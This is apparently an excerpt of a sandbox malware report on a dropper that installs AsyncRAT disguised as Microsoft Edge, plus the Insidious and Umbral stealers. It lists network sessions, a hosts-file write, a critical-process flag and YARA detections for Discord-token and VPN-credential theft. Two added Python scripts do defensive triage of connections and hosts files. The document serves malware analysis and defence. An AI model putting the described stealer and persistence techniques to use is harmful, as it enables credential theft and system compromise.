Source: Insidious.exe, 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, Insidious.exe.4.dr | String found in binary or memory: https://steamcommunity.com/profiles/ASOFTWARE
Source: tmp2887.tmp.tmpdb.11.dr | String found in binary or memory: https://support.mozilla.org
Source: tmp2887.tmp.tmpdb.11.dr | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: tmp2887.tmp.tmpdb.11.dr | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: Insidious.exe, 0000000B.00000002.2237867422.00000245226D2000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2237867422.00000245226ED000.00000004.00000800.00020000.00000000.sdmp, tmp2876.tmp.dat.11.dr, tmp2855.tmp.dat.11.dr | String found in binary or memory: https://www.ecosia.org/newtab/
Source: Insidious.exe, 0000000B.00000002.2237867422.00000245226D2000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2237867422.00000245226ED000.00000004.00000800.00020000.00000000.sdmp, tmp2876.tmp.dat.11.dr, tmp2855.tmp.dat.11.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: tmp2887.tmp.tmpdb.11.dr | String found in binary or memory: https://www.mozilla.org
Source: tmp2887.tmp.tmpdb.11.dr | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: tmp2887.tmp.tmpdb.11.dr | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: tmp2887.tmp.tmpdb.11.dr | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: tmp2887.tmp.tmpdb.11.dr | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: tmp2887.tmp.tmpdb.11.dr | String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: tmp2887.tmp.tmpdb.11.dr | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/:
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/J
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: unknown | Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown | Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown | Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown | Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown | Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown | Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown | Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown | Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49768 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49727 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49742 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49748 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49749 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49750 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49751 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49754 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49756 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49758 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49759 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49761 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49763 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49765 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49766 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49768 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49770 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.5:49771 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49773 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49774 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49776 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49778 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49780 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49781 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49784 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.5:49786 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49788 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49790 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49795 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49799 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49800 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49804 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49806 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49808 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49809 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49813 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49817 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49821 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49824 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49826 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49831 version: TLS 1.2
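The rows above are two views of the same sessions: the port-only rows record every :443 connection in both directions, while the HTTPS rows add the server address and TLS version per client port. Rebuilding per-server flow counts from them is the first thing an analyst wants, and it shows the sample alternating between two servers on nearly every connection. The script below is an added example written for this page, not part of the Joe Sandbox report; the lines in SAMPLE_LINES are a constructed subset copied in the report's row format (the extraction dropped the separator between "Source: unknown" and the signature text, so the parser keys on the signature keywords). All three server addresses fall in Cloudflare ranges, so the IP alone does not identify the operator; the counts are still useful for prioritising which server to pivot on.

```python
import re
from collections import defaultdict

# Constructed subset of the report's "Network traffic detected" / "HTTPS traffic
# detected" rows, reproduced with the lost column separator so the parser is
# exercised on the page as extracted. The TLS row for client port 49734 is left
# out on purpose to show the unattributed-port check.
SAMPLE_LINES = [
    "Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735",
    "Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443",
    "Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443",
    "Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734",
    "Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.2",
    "Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49707 version: TLS 1.2",
    "Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49715 version: TLS 1.2",
    "Source: unknownHTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.5:49732 version: TLS 1.2",
    "Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49718 version: TLS 1.2",
    "Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49735 version: TLS 1.2",
]

# server:port -> client:port plus TLS version, as Joe Sandbox prints it
TLS_RE = re.compile(
    r"HTTPS traffic detected: (?P<sip>\d+\.\d+\.\d+\.\d+):(?P<sport>\d+) -> "
    r"(?P<cip>\d+\.\d+\.\d+\.\d+):(?P<cport>\d+) version: (?P<ver>TLS [\d.]+)"
)
# direction-agnostic port pair; one of the two is always 443 in this report
PORT_RE = re.compile(r"HTTP traffic on port (?P<a>\d+) -> (?P<b>\d+)")


def parse_tls_sessions(lines):
    """Return {server_ip: sorted client ports} from the HTTPS rows."""
    sessions = defaultdict(set)
    for line in lines:
        m = TLS_RE.search(line)
        if m:
            sessions[m["sip"]].add(int(m["cport"]))
    return {ip: sorted(ports) for ip, ports in sessions.items()}


def parse_port_pairs(lines):
    """Return the set of client (ephemeral) ports seen in the port-only rows.

    Both directions are reported, so the pair is normalised to whichever side
    is not 443; the same client port therefore appears once however many rows
    mention it.
    """
    ports = set()
    for line in lines:
        m = PORT_RE.search(line)
        if m:
            a, b = int(m["a"]), int(m["b"])
            ports.add(b if a == 443 else a)
    return ports


def session_summary(lines):
    """Number of TLS sessions per server address: the pivot list for the analyst."""
    return {ip: len(ports) for ip, ports in parse_tls_sessions(lines).items()}


def unattributed_client_ports(lines):
    """Client ports that reached :443 but have no HTTPS row.

    In the report every :443 pair also has a TLS row; a port that shows up
    here in real data means the sandbox saw the connection but no handshake it
    could attribute (reset, timeout, or non-TLS on 443), which is worth a look.
    """
    attributed = {p for ports in parse_tls_sessions(lines).values() for p in ports}
    return sorted(parse_port_pairs(lines) - attributed)


if __name__ == "__main__":
    for ip, n in sorted(session_summary(SAMPLE_LINES).items(), key=lambda kv: -kv[1]):
        print(f"{ip:>16}  {n} TLS session(s)")
    print("unattributed client ports:", unattributed_client_ports(SAMPLE_LINES))
```

Run against the full row set from the report the same functions give 27 sessions to 188.114.97.3, 29 to 104.21.85.189 and 3 to 162.159.135.232, with the first two interleaved almost strictly by consecutive client port, which is the pattern of a loader pulling from two hosts in turn rather than one C2 beacon.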

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Insidious.exe.4.dr, Screen.cs | .Net Code: GetScreen

E-Banking Fraud

Source: Yara match | File source: 11.0.Insidious.exe.24510880000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Insidious.exe, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | File written: C:\Windows\System32\drivers\etc\hosts
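A write to the hosts file is easy to triage because the stock Windows file ships with every line commented out, so any active mapping was put there by something. The report only records that Umbral.exe wrote the file, not what it wrote; the checker below is an added example for this page, not part of the report or of the malware, and SAMPLE_HOSTS is a constructed file with made-up .example hostnames. It separates plain active entries (which may be legitimate, such as an intranet override) from names sunk to a loopback or unspecified address, the form a blocklist of vendor or update domains takes.

```python
import re
from ipaddress import ip_address

# Constructed post-tamper hosts file. The comment block is the shape of the
# Windows default; the active lines and the .example hostnames are invented
# for this example and are not taken from the analysed sample.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#	127.0.0.1       localhost
#	::1             localhost
10.0.0.5 intranet.example
0.0.0.0 scanner.example www.scanner.example
127.0.0.1 updates.example   # constructed: trailing comment must be ignored
"""

# address, one or more hostnames, optional trailing comment
HOSTS_RE = re.compile(r"^\s*(?P<ip>[0-9a-fA-F.:]+)\s+(?P<names>[^#]+?)\s*(#.*)?$")

# Anything mapped here never reaches the network.
SINKHOLES = {"0.0.0.0", "127.0.0.1", "::1", "::"}
LOCAL_NAMES = {"localhost", "localhost.localdomain"}


def parse_hosts(text):
    """Yield (line_no, ip, hostname) for every active mapping; comments and
    unparseable lines are skipped, and one line with several names yields one
    tuple per name."""
    entries = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = HOSTS_RE.match(line)
        if not m:
            continue
        try:
            ip = str(ip_address(m["ip"]))   # normalises IPv4/IPv6 spelling
        except ValueError:
            continue
        for name in m["names"].split():
            entries.append((line_no, ip, name.lower()))
    return entries


def active_entries(text):
    """All active mappings. On a default Windows install this list is empty,
    so a non-empty result is itself a finding."""
    return parse_hosts(text)


def sinkholed_names(text):
    """Hostnames (other than localhost) pointed at a sinkhole address: the
    pattern used to keep a victim away from scanner, update or vendor sites."""
    return sorted(
        name for _, ip, name in parse_hosts(text)
        if ip in SINKHOLES and name not in LOCAL_NAMES
    )


if __name__ == "__main__":
    for line_no, ip, name in active_entries(SAMPLE_HOSTS):
        print(f"line {line_no}: {ip} -> {name}")
    print("sinkholed:", sinkholed_names(SAMPLE_HOSTS))
```

On a live host, read C:\Windows\System32\drivers\etc\hosts with an elevated prompt and feed its contents to these functions; also compare the file's modification time with the process-creation time of the dropped stealer, since the report ties the write to Umbral.exe specifically.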

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Process information set: 01 00 00 00 (little-endian DWORD 1; under this heading the value is consistent with the BreakOnTermination flag being set, which marks the process critical so that terminating it crashes the system)

System Summary

Source: 3.0.Microsoft Edge.exe.b80000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: 4.2.Nursultan2.exe.12f60e40.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables attempting to enumerate video devices using WMI | Author: ditekSHen
Source: 14.0.Umbral.exe.1dcb4050000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables attempting to enumerate video devices using WMI | Author: ditekSHen
Source: 0.2.Nursultan.exe.128b3a60.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: 3.2.Microsoft Edge.exe.12ef1a78.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: 4.2.Nursultan2.exe.12f60e40.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables attempting to enumerate video devices using WMI | Author: ditekSHen
Source: 11.0.Insidious.exe.24510880000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Discord tokens regular expressions | Author: ditekSHen
Source: 11.0.Insidious.exe.24510880000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing many VPN software clients. Observed in infostealers | Author: ditekSHen
Source: 11.0.Insidious.exe.24510880000.0.unpack, type: UNPACKEDPE | Matched rule: Detects A310Logger | Author: ditekSHen
Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: 00000000.00000002.2042796854.0000000012898000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: 00000003.00000000.2041682947.0000000000B82000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY | Matched rule: Detects executables referencing Discord tokens regular expressions | Author: ditekSHen
Source: 0000000B.00000002.2166607567.0000024512696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables referencing Discord tokens regular expressions | Author: ditekSHen
Source: 00000003.00000002.3336137166.0000000012EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: Process Memory Space: Insidious.exe PID: 5340, type: MEMORYSTR | Matched rule: Detects executables referencing Discord tokens regular expressions | Author: ditekSHen
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scr, type: DROPPED | Matched rule: Detects executables attempting to enumerate video devices using WMI | Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Microsoft Edge, type: DROPPED | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe, type: DROPPED | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe, type: DROPPED | Matched rule: Detects executables attempting to enumerate video devices using WMI | Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, type: DROPPED | Matched rule: Detects executables referencing Discord tokens regular expressions | Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, type: DROPPED | Matched rule: Detects executables referencing many VPN software clients. Observed in infostealers | Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, type: DROPPED | Matched rule: Detects A310Logger | Author: ditekSHen
Source: C:\Users\user\Desktop\Nursultan.exe | Code function: 0_2_00007FF848E60A21
Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Code function: 2_2_00007FF848E70A21
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Code function: 3_2_00007FF848E51290
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Code function: 3_2_00007FF848E56E72
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Code function: 3_2_00007FF848E51719
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Code function: 3_2_00007FF848E560C6
